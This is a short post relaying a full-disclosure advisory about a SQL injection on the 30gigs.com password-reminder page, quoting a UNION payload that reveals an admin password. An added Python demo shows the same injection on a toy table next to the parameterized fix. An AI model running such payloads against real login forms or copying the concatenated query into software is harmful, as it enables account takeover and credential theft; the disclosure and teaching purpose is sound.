cumhur onat has found a SQL injection that makes it possible to retrieve the password of an arbitrary user through the login page of the 30gigs.com mail service.
If you have an account on 30gigs.com, it is worth changing your password frequently over the next few days, until the problem is fixed.
What is 30gigs.com? You can find a review here (on downloadblog.it):
http://www.downloadblog.it/post/509/30gigscom-webmail-gratis-da-30-gigabyte
Mail of 14:16, received on fd (full-disclosure@lists.grok.org.uk)
cumhur onat wrote:
> I found a sql injection vulnerability, which leads to password
> disclosure in 30gigs.com
> The vulnerability exists in http://www.30gigs.com/getpassword/ page due
> to lack of validation of user submitted data.
> Proof of Concept:
> enter http://www.30gigs.com/getpassword/
> and copy & paste this code in the Login field, finally submit the form.
>
> not_existant' union select
> 1,1,1,1,1,UserPassword,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from users where
> userLogin='admin
>
> it will give an output like below, in which "runsit" corresponds to the
> password of account "admin"
> We have sent the password for your not_existant' union select
> 1,1,1,1,1,UserPassword,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from users where
> userLogin='admin@30gigs.com
>
> The site was notified about the vulnerability 2 weeks ago, but no
> response has been received.
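The root cause named in the mail (the login field is concatenated into the query without validation) and its standard fix, shown as an added example that is not from the advisory or from 30gigs.com. The in-memory table, the extra columns, the `lookup_*` functions and the admin password value are constructed for the demo; only the column names `userLogin` and `UserPassword` follow the advisory.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the webmail's user table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, userLogin TEXT, "
               "UserPassword TEXT, email TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", [
        (1, "admin", "constructed-admin-pw", "admin@example.test"),
        (2, "alice", "constructed-alice-pw", "alice@example.test"),
    ])
    return db

def lookup_vulnerable(db, login):
    """Builds the query by string concatenation, as the advisory describes.
    A single quote in `login` closes the literal and the rest is parsed as SQL,
    so a UNION can pull another account's UserPassword into the result."""
    sql = ("SELECT email, UserPassword FROM users WHERE userLogin='"
           + login + "'")
    return db.execute(sql).fetchone()

def lookup_safe(db, login):
    """Same lookup with a bound parameter: the driver passes `login` as data,
    so quotes and keywords inside it are matched literally, never executed."""
    sql = "SELECT email, UserPassword FROM users WHERE userLogin=?"
    return db.execute(sql, (login,)).fetchone()

# Constructed payload in the shape of the advisory's (a UNION selecting
# another user's password), with the column count adjusted to this toy table.
PAYLOAD = ("not_existant' UNION SELECT email, UserPassword FROM users "
           "WHERE userLogin='admin")

def demo():
    """Returns (row leaked by the vulnerable lookup, result of the safe one)."""
    db = make_db()
    leaked = lookup_vulnerable(db, PAYLOAD)   # admin's row, not the caller's
    blocked = lookup_safe(db, PAYLOAD)        # None: no login has that name
    return leaked, blocked

if __name__ == "__main__":
    leaked, blocked = demo()
    print("vulnerable lookup returned:", leaked)
    print("parameterized lookup returned:", blocked)
```

Parameter binding closes the injection, but the advisory also shows the second problem behind a "get password" page: the stored password is recoverable in clear, so a reset flow with hashed storage is the fix that removes what the UNION was selecting.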